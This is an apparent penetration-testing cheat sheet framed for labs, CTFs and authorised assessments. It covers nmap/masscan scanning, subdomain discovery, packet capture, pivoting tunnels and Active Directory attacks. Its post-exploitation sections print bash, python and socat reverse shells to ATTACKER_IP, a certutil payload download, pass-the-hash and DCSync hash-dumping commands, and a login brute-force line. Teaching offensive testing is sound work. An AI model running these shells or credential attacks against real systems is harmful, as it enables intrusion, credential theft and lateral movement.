
Created Sat, 23 May 2026 22:32:06 +0000 Modified Thu, 04 Jun 2026 12:50:33 +0000

A handy collection of common pentesting commands used during recon, enumeration, scanning, exploitation, and more. Great for quick reference during labs, CTFs, or real-world assessments.

Pentesting Commands

Reconnaissance

nmap

By default (running as root against a non-local network), Nmap sends four probes during host discovery and marks a host as up if any of them gets a reply:

  • ICMP type 8 (echo request)
  • TCP SYN packet to port 443
  • TCP ACK packet to port 80
  • ICMP type 13 (timestamp request)

On a local Ethernet segment Nmap uses ARP requests instead, which also yields the MAC address details. An unprivileged user only gets TCP connect() probes to ports 80 and 443.

If a firewall is blocking the default ICMP pings you can change the probe types and try the following:

  • TCP SYN Ping -PS <portlist> - send a TCP SYN to the port(s) you specify (default: 80, not all ports). Either a SYN/ACK or a RST reply proves the host is up.
  • TCP ACK Ping -PA <portlist> - set the acknowledgement (ACK) flag in the TCP header (default port 80); stateless firewalls that only drop SYNs often let it through.
  • UDP Ping -PU <portlist> - use User Datagram Protocol (UDP); an ICMP port-unreachable reply from a closed port proves the host is up (default port 40125).
  • SCTP INIT Ping -PY <portlist> - the Stream Control Transmission Protocol (SCTP), an alternative to TCP or UDP probes (default port 80). Note that -sY is the SCTP INIT port scan, not the ping.
  • -Pn skips host discovery entirely and port-scans every address; -sn does the opposite (discovery only, no port scan).
Port State       Description
open             An application is accepting TCP connections, UDP datagrams or SCTP associations on the port.
closed           The port is reachable (it answers probes, e.g. with a RST) but no application is listening on it.
filtered         Packet filtering (firewall, router ACL, host-based filter) keeps Nmap's probes from reaching the port, so Nmap cannot tell whether it is open.
unfiltered       The port is reachable, but Nmap cannot determine whether it is open or closed (only reported by the ACK scan, -sA).
open|filtered    Nmap cannot tell whether the port is open or filtered because nothing answered; common for UDP and for -sN/-sF/-sX scans.
closed|filtered  Nmap cannot tell whether the port is closed or filtered (only reported by the idle scan, -sI).
# Default Scans
nmap -sC -sV 172.21.0.0
nmap -Pn -sC -sV -p- 172.21.0.0
nmap -sV -Pn 172.21.0.0
nmap -T4 -sC -sV 172.21.0.0
# -A already implies -sC and -sV (plus OS detection and traceroute); -oA writes .nmap, .gnmap and .xml files with the given basename
nmap -vv -Pn -A -sS -T4 -p- 172.21.10.0/24 -oA fullscan

# Stealth Scans: 
nmap -sS -sC -sV 172.21.0.0
nmap -sS -p- 172.21.0.0

# UDP Scan (slow: closed UDP ports answer with rate-limited ICMP errors, so keep the port list short)
nmap -sS -sU -Pn -sV 172.21.0.0
nmap -sU -A --top-ports 20 --version-all <target>
nmap -sU -A -p 53,67,68,161,162 --version-all <target>

# Aggressive Scans:
# Once you have results from your initial scan, run an aggressive scan in the background
# against the live hosts (fullscan.txt, one per line) to obtain more information:
nmap -oA fullscan-aggressive -T4 -vvv --max-rtt-timeout 300ms --max-retries 3 --host-timeout 30m --max-scan-delay 500ms -Pn -p- -sV --version-intensity 1 -iL fullscan.txt

Use --max-rtt-timeout and --max-scan-delay for scans that fail to complete or skip hosts too fast. Keep in mind that --host-timeout discards all results for a host that exceeds the limit.

Additionally, for a slower, low-parallelism approach (one host and one probe at a time, which is quieter on an IDS and gentler on fragile hosts) the following can be used. Note that --max-retries 0 sends each probe only once, so a dropped packet is reported as filtered; raise it if completeness matters more than speed:

nmap -sT -Pn -p- --max-parallelism 1 --max-retries 0 --max-rtt-timeout 1000ms --max-hostgroup 1 -oX nmap_<IP/HOST_NAME>-all_ports_slow.xml -iL <IP/HOST_NAME>_Active_IPs.txt

# T0 and T1 - best for IDS evasion but are extremely SLOW.
# T2 - slows the scan to conserve bandwidth.
# T3 - the default and is the most stable option.
# T4 - the recommended choice for a fast scan that is still relatively stable.
# T5 - the fastest option but can be unstable and should only be used on a network that can handle the speed.
# nmap banner grabbing
nmap -sV <target_IP> -p <port number>
nmap -sV --script=banner <target_IP>

# Host discovery only (-sn disables the port scan, not the ping); -PR forces ARP ping on the local segment and returns MAC addresses
nmap -PR -sn <target>

# Use nmap to discover web servers on the network and pipe the grepable output to Nikto (-h - reads nmap -oG output from stdin)
nmap -p80,443 10.0.1.0/24 -oG - | nikto -h -
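The Nikto pipe above relies on nmap's grepable (-oG) format. The following is an added example, not part of the original page, that parses that format into host:port pairs so any tool (or a loop over Nikto runs, or an nmap -iL list) can consume it. The nmap output and the function names are constructed for the example; real -oG lines separate fields with tabs, which the parser tolerates because it anchors on the "Ports:" and "Ignored State:" labels instead of column positions.

```shell
#!/bin/sh
# Added example (not from the original page): parse `nmap -oG -` output
# into host:port pairs for the requested port state.

# Constructed sample of grepable output (real output uses tabs between fields).
sample_grepable() {
  cat <<'EOF'
# Nmap 7.94 scan initiated as: nmap -p80,443,8080 -oG - 10.0.1.0/29
Host: 10.0.1.1 ()   Ports: 80/open/tcp//http///, 443/closed/tcp//https///, 8080/open|filtered/tcp//http-proxy///   Ignored State: closed (0)
Host: 10.0.1.2 (web2.lab)   Ports: 80/closed/tcp//http///, 443/open/tcp//https///   Ignored State: filtered (1)
Host: 10.0.1.3 ()   Status: Down
# Nmap done -- 8 IP addresses (2 hosts up) scanned
EOF
}

# ports_in_state STATE  (default: open)
# Reads grepable output on stdin and prints one "host:port" per port in STATE.
ports_in_state() {
  awk -v want="${1:-open}" '
    /^Host: / && /Ports: / {
      host = $2
      line = $0
      sub(/.*Ports: /, "", line)                 # drop everything before the port list
      sub(/[ \t]+Ignored State:.*$/, "", line)   # drop the trailing summary
      n = split(line, entries, ",")
      for (i = 1; i <= n; i++) {
        sub(/^[ \t]+/, "", entries[i])
        split(entries[i], f, "/")                # port/state/proto//service///
        if (f[2] == want) print host ":" f[1]
      }
    }'
}

# hosts_with_open_ports: unique hosts with at least one open port,
# ready for `nmap -iL` or a per-host Nikto loop.
hosts_with_open_ports() {
  ports_in_state open | cut -d: -f1 | awk '!seen[$0]++'
}

# Demo on the constructed sample. A live run would be:
#   nmap -p80,443 10.0.1.0/24 -oG - | ports_in_state open
sample_grepable | ports_in_state open
```

Note that "open|filtered" is its own state string, so `ports_in_state 'open|filtered'` is needed to list the UDP-style ambiguous ports; a plain `open` filter deliberately leaves them out.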

nmap scripts

# Location: /usr/share/nmap/scripts/

# list available scripts
ls -al /usr/share/nmap/scripts/

# dns script: checks whether a DNS server uses random source ports (run against the DNS port)
nmap -sU -p 53 --script=dns-random-srcport <target>
# Detect CSRF vulnerabilities
nmap -sV --script http-csrf <target domain>
# Check if the "shellshock" vulnerability can be exploited in a web app (the script is http-shellshock; point uri at a CGI script)
nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/<cgi_script> <target domain>
# Attempt to perform a DNS update without authentication
nmap -sU -p 53 --script=dns-update --script-args=dns-update.hostname=foo.example.com,dns-update.ip=192.0.2.1 <target IP address>
# Check if the target is vulnerable to the Samba arbitrary shared library load vulnerability (CVE-2017-7494)
nmap --script smb-vuln-cve-2017-7494 -p 445 <target IP address>

# Running multiple scripts (comma-separated script names or categories; the vuln category can be intrusive)
nmap --script vuln,safe,discovery -oN results.txt target-ip

# Scripts categories:
https://nmap.org/nsedoc/categories/vuln.html

Vuln vs Vulners vs Vulscan NSE scripts

Description                                  Vuln                                            Vulners                                                Vulscan
Included Nmap scripts                        Yes                                             Yes                                                    No
Sends CPE data outside of the organization   No                                              Yes*                                                   No
Requires download of vulnerability database  No, but limited CVEs                            No*                                                    Yes
Confidence                                   High                                            Depends                                                Depends
Potentially Disruptive                       Yes                                             No                                                     No
When to Use                                  Thorough, accurate scan of key vulnerabilities  In-depth scan, no concern about sending out CPE data   More in-depth scan and a desire not to release CPE data

*Vulners has the option to download and use a local database.

nmap NSE script - Vulscan

# Vulscan runs non-invasive tests: it matches the -sV version/CPE output against its local CVE databases, so the only target interaction is the version scan itself. The results display the port followed by limited information on the matched CVEs.
# Installation:
# - Clone the repo (the directory is named vulscan):
sudo git clone https://github.com/scipag/vulscan
# - Make a soft link into the NSE scripts directory
sudo ln -s "$(pwd)/vulscan" /usr/share/nmap/scripts/vulscan
# Command syntax
sudo nmap -sV --script=vulscan/vulscan.nse <target IP address or host name>

# Other NSE examples
# sniff the network for 60 sec using the eth0 interface, add any new hosts it sees as targets, and then scan those targets
sudo nmap --script=targets-sniffer --script-args=newtargets,targets-sniffer.timeout=60s,targets-sniffer.iface=eth0

# Scans through a SOCKS proxy. This feature is experimental: it only works with TCP connect scans, and host discovery and DNS are not proxied, so add -sT -Pn -n
nmap --proxies socks4://proxy-ip:8080 -sT -Pn -n target-ip

Unicornscan

# UDP mode (-mU) against common UDP service ports
unicornscan -mU -p 53,67,68,69,123,135,137,138,139,161,162,445,500,637,1434 <target>

netcat

#!/bin/bash
# Connect-scan one host with netcat: -z (no data), -n (no DNS), -w 1 (1 s timeout per port).
# nc reports results on stderr, so redirect 2>&1 into the log; "open" (traditional nc)
# and "succeeded" (OpenBSD nc) are the success strings.
# The original nested loops walked 10.100.0.0/16 times 65536 ports (roughly 4 billion
# connections at 1 s each); scope the host and port range instead.
host="${1:?usage: $0 <host> [first-port] [last-port]}"
first="${2:-1}"
last="${3:-1024}"
for port in $(seq "$first" "$last"); do
    nc -v -z -n -w 1 "$host" "$port" 2>&1 | grep -E 'open|succeeded' >> nc_port_scan.txt
done

Naabu

Source: https://github.com/projectdiscovery/naabu

# Installing Naabu: 
# Latest: 
go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
 
# In Kali Linux: 
sudo apt install naabu
 
# Using Naabu: 
naabu -host megacorpone.com
naabu -p 80,443,21-23,u:53 -host megacorpone.com
naabu -p - -exclude-ports 80,443 -host megacorpone.com
naabu -host megacorpone.com -json

rustscan

# Source: https://github.com/bee-san/RustScan
# Flags: -a/--addresses (IPs, CIDRs, hostnames or a file), -p/--ports, -r/--range (port range),
# -b/--batch-size, -t/--timeout (ms), --ulimit; TCP is the default; anything after -- is passed to nmap

rustscan -a 172.21.0.0 -p 80,443,21-23
rustscan -a 172.21.0.0 -p 80,443,21-23 --udp   # needs a RustScan release with UDP support (2.4 or newer)
rustscan -a 172.21.0.0/24 -r 1-65535
rustscan -a 172.21.0.0/24 -r 1-65535 -- -sC -sV   # hand the open ports to nmap
# Excluding single addresses from a CIDR needs the --exclude-addresses option of recent releases; check rustscan --help
rustscan -a <target-subnet> -r <port_range>
rustscan -a <host> -r <port-range> -b <batch-size> -t <timeout-ms>

masscan

# Scanning targets
masscan 172.21.10.0
masscan 172.21.10.0/24 172.21.0.0/16
masscan 172.21.10.0/24 --excludeFile <File>
masscan 172.21.10.0/24 --exclude 172.21.10.254

# Scanning for services:
masscan 172.21.10.1 -p 80
masscan 172.21.10.1 -p 0-65535
masscan 172.21.10.1 -p 80,443
# --rate is packets per second: 1,000,000 pps saturates most uplinks and trips every IDS, so start low (e.g. 1000) and raise it; -oL writes list output
masscan 172.21.10.0/24 -p 0-65535 --rate 1000000 --open-only --http-user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" -oL "output.txt"

# UDP Scan (the U: prefix selects UDP ports)
masscan 172.21.10.1 -pU:53

## Report only open ports
masscan 10.0.0.1 --open-only

# Other Options
## Offline Mode (Reviews how fast the program runs without the transmit overhead)
masscan 0.0.0.0/24 --offline

## Obtaining service banners (needs a port list; the scanning host's kernel must not RST the half-open connections, so use a spare --source-ip on the same subnet or firewall the source port)
masscan 172.21.10.1 -p 80,443 --banners --source-ip 172.21.10.200

## Source IP spoofing (replies go to the spoofed address, so you only see them if you also control it)
masscan 10.0.0.1 --source-ip 192.168.1.200

## Change the default user agent
masscan 10.0.0.1 --http-user-agent <user-agent>

## Save sent packet in PCAP
masscan 10.0.0.1 --pcap <filename>

# References:
# https://github.com/robertdavidgraham/masscan
# https://danielmiessler.com/study/masscan/

Domain Discovery

# Pass the apex domain (example.com), not a hostname such as www.example.com

Sublist3r

sublist3r -d example.com
sublist3r -v -d example.com -p 80,443

Subfinder

subfinder -d example.com

OWASP AMASS

amass enum -d example.com
amass intel -whois -d example.com
amass intel -active -addr 172.21.0.0-64 -p 80,443,8080,8443
amass intel -ipv4 -whois -d example.com
amass intel -ipv6 -whois -d example.com

Sniffing

tcpdump

tcpdump -i eth0
tcpdump -c 100 -i eth0          # stop after 100 packets (-c needs a count)
tcpdump -A -i eth0              # print payloads as ASCII
tcpdump -w 0001.pcap -i eth0
tcpdump -r 0001.pcap
tcpdump -n -i eth0              # no name resolution
tcpdump -i eth0 port 22
tcpdump -i eth0 src host 172.21.10.X
tcpdump -i eth0 dst host 172.21.10.X

tshark

# General Options:
tshark --list-interfaces
tshark -i interface
tshark -i interface -w capture.pcap
tshark -r capture.pcap # reading a pcap file (-r replaces -i)
# Filtering Protocols:
tshark -i interface -Y "http || dns || tcp"
tshark -i interface -Y "http && tcp"
tshark -i interface -Y "http || dns"
# Filtering IP address:
tshark -i interface -Y "ip.src == 172.21.0.0"
# Destination: 
tshark -i interface -Y "ip.dst == 172.21.0.0"
# Either Source or Destination: 
tshark -i interface -Y "ip.addr == 172.21.0.0"
# Traffic between two specific hosts, in either direction:
tshark -i interface -Y "(ip.src == 172.21.0.10 && ip.dst == 172.21.0.20) || (ip.src == 172.21.0.20 && ip.dst == 172.21.0.10)"
# IP Range:
tshark -i interface -Y "ip.addr == 172.21.0.0/24"
# Using Filters and IP Addresses: 
tshark -i interface -Y "ip.src == 172.21.0.0 && http"

dumpcap

dumpcap -i interface -w capture.cap

Post-Exploitation

After obtaining access: establish persistence, pivot, exfiltrate data.

File Transfer

# Quick HTTP server to transfer files
python3 -m http.server 8080

# Download file on Windows target
certutil -urlcache -split -f http://ATTACKER_IP:8080/file.exe C:\Temp\file.exe

Reverse Shells

# Bash reverse shell
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Shell Upgrade

# Upgrade to interactive TTY
python3 -c 'import pty;pty.spawn("/bin/bash")'
# then press Ctrl+Z, and on the attacker run: stty raw -echo; fg   (press Enter twice), then on the target:
export TERM=xterm; stty rows 50 cols 200

Pivoting and Tunneling

Tunnel Verification

# Check if your tunnel is active and running (on the attacker, for the local listener port):
nc -z localhost <port> || echo 'no tunnel open'
netstat -lpnt | grep <port> | grep ssh
ps aux | grep ssh
ss -ntlp

SSH Tunneling

Forward Dynamic SOCKS Proxy

The ssh client opens a SOCKS listener on the attacker (localhost:<LOCAL_PORT>). Each connection made to it is carried over the SSH session and the target's sshd makes the outbound connection, so anything the target can reach becomes reachable from the attacker.

# Note: the target must be running an SSH service you can authenticate to.
# SOCKS operates at layer 4 and up on the OSI model. Ping -- or ICMP -- is a layer 3 protocol and does not flow over SOCKS. So, you cannot ping targets through a SOCKS proxy (nmap needs -Pn, and only -sT connect scans work).
# The UserKnownHostsFile/StrictHostKeyChecking options below skip host-key verification for throwaway lab hosts; drop them when a man-in-the-middle on the path matters.

# Password authentication (on the attacker)
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D localhost:<LOCAL_PORT> user@target

# Key authentication (on the attacker)
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D localhost:<LOCAL_PORT> -i /path/to/private-key user@target

# Dynamic SOCKS Proxy with ProxyChains
# 1. On the attacker machine create the SSH tunnel: ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D localhost:<LOCAL_PORT> user@target
# 2. Setup ProxyChains. Edit the config file (/etc/proxychains4.conf on Kali; /etc/proxychains.conf on older installs)
# 3. Add the following line at the end of the [ProxyList] section: socks5 127.0.0.1 <LOCAL_PORT>
# 4. Run commands through the tunnel (TCP only, so nmap needs -Pn -sT)
proxychains <command>
sudo proxychains -q nmap -Pn -sT --top-ports 500 <target(s)>
# curl connection using the SOCKS proxy (58080 = <LOCAL_PORT>). With socks5:// the connection is made from the SSH server side, so 127.0.0.1:8080 here is the target's own loopback; use socks5h:// to also resolve hostnames remotely
curl --proxy 'socks5://127.0.0.1:58080' http://127.0.0.1:8080

# More info: https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-ssh
Reverse Dynamic SOCKS Proxy
# Create a dummy account on Kali -> generate an SSH key pair -> transfer the private key to the target -> run ssh on the target (victim). The victim connects back to the attacker and acts as the SOCKS proxy for whatever the attacker sends into the listener (-R with a port but no destination; needs OpenSSH 7.6 or newer on the victim).
⚠️ BE CAREFUL WITH REVERSE CONNECTIONS BACK TO ATTACK BOX ⚠️
- REMOVE THE CREDENTIAL ONCE YOU HAVE ACHIEVED THE GOAL -
# The dummy account should be unprivileged, use a dedicated key and ideally be restricted in sshd_config (no shell via ForceCommand, PermitListen limited to the tunnel port), because anyone on the victim who reads the key can log in to your attack box.

# Password Authentication (on the victim)
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R 127.0.0.1:<ATTACKER_PORT> junk_user@<ATTACKER_HOST>

# Key Authentication (on the victim)
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R 127.0.0.1:<ATTACKER_PORT> -i /path/to/private-key junk_user@<ATTACKER_HOST>

# curl to a target via the reverse SOCKS proxy (on the attacker; 58080 = <ATTACKER_PORT>, and 127.0.0.1:8080 is the victim's loopback)
curl --proxy 'socks5://127.0.0.1:58080' http://127.0.0.1:8080

# Dynamic Reverse SOCKS Proxy with ProxyChains
# 1. On the victim machine create the SSH tunnel:
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R 127.0.0.1:<ATTACKER_LOCAL_PORT> junk_user@<ATTACKER_HOST>
# 2. On the attacker machine setup ProxyChains. Edit the config file
/etc/proxychains4.conf
# 3. Add the following line at the end of the [ProxyList] section: socks5 127.0.0.1 <ATTACKER_LOCAL_PORT>
# 4. Run commands through the tunnel (on the attacker)
proxychains <command>
# TCP connect scans through a proxy are very slow, so stick to the top 1000 ports; 127.0.0.1 here is the victim's loopback
sudo proxychains -q nmap -Pn -sT --top-ports 1000 -T4 -sC -sV 127.0.0.1

# More info: https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-ssh

💡 Tips and Tricks

# On the target - generate a list of -L port forwards for every loopback-only listener, excluding the local DNS resolver (port 53 exactly; a bare `grep -v 53` would also drop 5353 or 8530).
# Change -L to -R if you want the output for reverse port forwards (run from the target towards the attacker instead).
ss -plutan | grep -i listen | grep -oE '(127\.0\.0\.1|\[::1\]):[0-9]{1,5}' | grep -vE ':53$' | sed 's/\[::1\]/127.0.0.1/g' | sort -u | xargs -I {} echo '-L {}:{} \'
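The same idea as the one-liner above, as an added example that is not part of the original page: a function that turns `ss -plutan` output into ssh -L (or -R) arguments, excludes port 53 exactly, collapses the IPv4/IPv6 duplicates of one service, and prints arguments that drop straight into an ssh command line. The ss output is constructed sample data and the function name is an assumption of the example.

```shell
#!/bin/sh
# Added example (not from the original page): build ssh -L/-R port-forward
# arguments for every loopback-only TCP listener in `ss -plutan` output.

# Constructed sample of `ss -plutan` output on a pivot host.
sample_ss() {
  cat <<'EOF'
Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
udp   UNCONN 0      0      127.0.0.1:53        0.0.0.0:*         users:(("dnsmasq",pid=512,fd=6))
tcp   LISTEN 0      32     127.0.0.1:53        0.0.0.0:*         users:(("dnsmasq",pid=512,fd=7))
tcp   LISTEN 0      128    127.0.0.1:3306      0.0.0.0:*         users:(("mysqld",pid=901,fd=21))
tcp   LISTEN 0      511    127.0.0.1:8080      0.0.0.0:*         users:(("java",pid=1203,fd=44))
tcp   LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=640,fd=3))
tcp   LISTEN 0      128    [::1]:8080          [::]:*            users:(("java",pid=1203,fd=45))
tcp   LISTEN 0      128    127.0.0.1:5353      0.0.0.0:*         users:(("avahi",pid=700,fd=9))
tcp   LISTEN 0      128    [::]:22             [::]:*            users:(("sshd",pid=640,fd=4))
EOF
}

# loopback_forwards [-L|-R]   (default: -L)
# Reads `ss -plutan` output on stdin and prints one
# "<flag> 127.0.0.1:PORT:127.0.0.1:PORT" line per loopback-only TCP listener.
# Wildcard listeners (0.0.0.0 / [::]) are reachable directly and are skipped.
loopback_forwards() {
  awk -v flag="${1:--L}" '
    $2 == "LISTEN" {
      addr = $5
      if (addr ~ /^127\.0\.0\.1:/ || addr ~ /^\[::1\]:/) {
        port = addr
        sub(/.*:/, "", port)                    # keep only the port number
        if (port != "53" && !(port in seen)) {  # skip the resolver, dedupe v4/v6
          seen[port] = 1
          printf "%s 127.0.0.1:%s:127.0.0.1:%s\n", flag, port, port
        }
      }
    }'
}

# Demo on the sample. On a real pivot, the arguments feed ssh directly:
#   ssh -N $(ss -plutan | loopback_forwards -L) user@target
sample_ss | loopback_forwards -L
```

Each emitted `-L 127.0.0.1:PORT:127.0.0.1:PORT` binds PORT on the attacker's loopback and forwards it to the same port on the target's loopback; with `-R` the direction is reversed and the command is run from the target.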

sshuttle

sshuttle gives you a VPN-like tunnel over an SSH connection (it only needs python on the remote side, not root) to reach a private range that is accessible from a publicly reachable server such as a bastion host or a target server. Unlike a SOCKS proxy it carries any TCP traffic (and DNS with --dns) transparently without proxychains, but still not ICMP.

# In Kali
# Source: https://github.com/sshuttle/sshuttle

sshuttle -r root@172.21.0.0 10.2.2.0/24
sshuttle -D -r user@host 10.10.10.10 0/0 --ssh-cmd 'ssh -i ./id_rsa' # Daemon mode
sshuttle -D --dns -vr user@yourserver.com 0/0 --ssh-cmd 'ssh -i /your/key/path.pem' # Daemon mode with DNS
# Working with your .ssh/config
sshuttle --dns -vr user@server 0/0 --ssh-cmd 'ssh jumpbox'
sshuttle --dns -r myserver 0/0 -x <server-IP>
sshuttle ... --ssh-cmd 'ssh -F configfile'

Socat

# Bind Shell
victim-> socat TCP-LISTEN:443,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker-> socat FILE:`tty`,raw,echo=0 TCP4:<VICTIM_IP>:443

# Reverse Shell
attacker-> socat TCP-LISTEN:443,reuseaddr FILE:`tty`,raw,echo=0
victim-> socat TCP4:<attackers_ip>:443 EXEC:bash,pty,stderr,setsid,sigint,sane

netcat Port Forwarder

# 1. On the pivot machine create a named pipe (FIFO) called pivot
cd /tmp && mknod pivot p
# 2. On the pivot, listen on the pivot port and relay both directions through the FIFO (serves one connection; wrap it in `while true; do ...; done` to persist)
nc -l -p <PIVOT_LISTENING_PORT> 0<pivot | nc <TARGET_HOST> <TARGET_PORT> 1>pivot
# 3. On the attacker machine connect to the pivot's listening port; the traffic lands on <TARGET_HOST>:<TARGET_PORT>. For example, with the target's SSH (port 22) relayed via pivot port 4000:
ssh user@pivot.host.example.com -p 4000

reGeorg

Source: https://github.com/sensepost/reGeorg
Note: reGeorg requires Python 2.7 and the following module:

urllib3 - HTTP library with thread-safe connection pooling, file post, and more.

1. Upload tunnel.(aspx|ashx|jsp|php) to a webserver on the target side
2. Start reGeorgSocksProxy.py (below), then point proxychains or your browser at the SOCKS proxy using the IP address (127.0.0.1) and the port you specified with -p

python reGeorgSocksProxy.py -p 8080 -u http://upload.target.net:8080/tunnel/tunnel.jsp

Metasploit

# Meterpreter
# Use when you have a meterpreter session and need to pivot into another network.

# Portfwd (listen on attacker port 80 and relay through the session to 172.21.0.0:80)
meterpreter > portfwd add -l 80 -r 172.21.0.0 -p 80

# Autoroute
# In Metasploit
1. use post/multi/manage/autoroute

msf5 post(multi/manage/autoroute) > options

Module options (post/multi/manage/autoroute):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD      autoadd          yes       Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
   NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR as "/24")
   SESSION                   yes       The session to run this module on.
   SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)

msf5 post(multi/manage/autoroute) > 

2. set SESSION <available session id>
3. run
# Metasploit SOCKS proxy (from `search socks`); run it with SRVHOST 127.0.0.1 and add its port to proxychains so tools use the routes added by autoroute

   auxiliary/server/socks4a     Socks4a Proxy Server
   auxiliary/server/socks5      Socks5 Proxy Server
   auxiliary/server/socks_unc   SOCKS Proxy UNC Path Redirection
# Current Metasploit releases replace the first two with auxiliary/server/socks_proxy (set VERSION 4a or 5)

Cntlm

apt install cntlm

1. Start Cntlm with an interactive password prompt (-I) for the domain user, listening on 3128 and authenticating to the upstream NTLM proxy: cntlm -I -u username@breakme.local -l 3128 <proxy_host>:<proxy_port>
2. export http_proxy=http://127.0.0.1:3128 https_proxy=http://127.0.0.1:3128
3. Accessing with browser: chromium --proxy-server="http://127.0.0.1:3128"

More tools:

Resources to learn more about pivoting and tunneling:

Enumeration

AD Enumeration

bloodhound

# Collect BloodHound data remotely
bloodhound-python -c All -d DOMAIN.LOCAL -u USER -p PASS -ns DC_IP
# LDAP user enumeration
ldapsearch -x -H ldap://DC_IP -D "USER@DOMAIN" -w PASS -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName

Password Authentication

# List any service principals associated with the user
impacket-GetUserSPNs -dc-ip domain-controller-ip 'domain.tld/username:password'

# Request a TGS
impacket-GetUserSPNs -dc-ip domain-controller-ip 'domain.tld/username:password' -request

# Post-compromise via a proxy host
proxychains -q impacket-GetUserSPNs -dc-ip domain-controller-ip 'domain.tld/username:password'
proxychains -q impacket-GetUserSPNs -dc-ip domain-controller-ip 'domain.tld/username:password' -request

Pass-the-Hash

# List any service principals associated with the user
impacket-GetUserSPNs -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username'

# Request a TGS
impacket-GetUserSPNs -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username' -request

# Get shell using NTLM hash (no password needed)
impacket-psexec DOMAIN/USER@TARGET_IP -hashes :NTLM_HASH

# Post-compromise via a proxy host
proxychains -q impacket-GetUserSPNs -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username'
proxychains -q impacket-GetUserSPNs -dc-ip domain-controller-ip -hashes lm-hash:nt-hash 'domain.tld/username' -request

ASREPRoast

# Accounts with "Do not require Kerberos preauthentication" return an AS-REP that can be cracked offline. GetNPUsers does this request (GetUserSPNs is the Kerberoasting tool, see below).
impacket-GetNPUsers <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
# Without credentials, from a list of candidate usernames
impacket-GetNPUsers <domain_name>/ -usersfile <users_file> -no-pass -dc-ip <DOMAIN-CONTROLLER-IP> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
# Crack with hashcat -m 18200

Kerberoasting

# Authenticate with valid credentials, enumerate accounts in the domain that have Service Principal Names (SPNs) and request TGS tickets. -request is what yields the crackable hashes; without it you only get the listing.
impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -dc-ip <DOMAIN-CONTROLLER-IP> -request -outputfile <output_TGSs_file>
# Crack with hashcat -m 13100

# Overpass The Hash/Pass The Key (PTK): request a TGT with an NT hash, an AES key or a password
python3 getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
python3 getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
python3 getTGT.py <domain_name>/<user_name>:[password]
# getTGT writes <user_name>.ccache; point the Kerberos libraries at it
export KRB5CCNAME=<user_name>.ccache

# Use the TGT (-k -no-pass) to execute remote commands with the following impacket scripts; give the target by hostname, not IP, so the service ticket matches the SPN:
python3 psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python3 smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python3 wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

DCSync

# Dump all domain NTLM hashes via DCSync
impacket-secretsdump DOMAIN/USER:PASS@DC_IP -just-dc-ntlm

Netexec

NetExec (a.k.a. nxc, the maintained successor of CrackMapExec) is a network service exploitation tool that helps automate assessing the security of large networks.

# Kali installation: apt install netexec

Fuzzing

💡 Tips: Fuzz non-printable and delimiter characters in any user input; this can result in regex bypass, account takeover and similar issues. Raw bytes: 0x00, 0x2F, 0x3A, 0x40, 0x5B, 0x60, 0x7B, 0xFF. URL-encoded: %00, %2F, %3A, %40, %5B, %60, %7B, %FF

Fuzzing Wordlists

ffuf

# Enumerate URLs
ffuf -u http://localhost:3000/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt


# Enumerate Files
ffuf -u http://localhost:3000/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .php,.html,.txt

# Subdomain Enumeration
ffuf -u http://FUZZ.mydomain.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

# Find Usernames
# The -mr flag is used to match a regular expression. You can have complicated regular expressions or a simple string message to validate the requests.
ffuf -w /usr/share/SecLists/Usernames/top-usernames-shortlist.txt -X POST -d "username=FUZZ&password=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://mydomain.com/login -mr "username already exists"

# Username / pwd Brute Forcing
# The default placeholder FUZZ replaced by variables e.g. W1 for username and W2 for the password wordlist.
# Any valid combinations found, you will see in the results. For noise reduction filter by status codes (e.g. 400 or 200) using the -fc or -mc flags.
ffuf -w usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://localhost:3000/login -fc 200

API Fuzzing

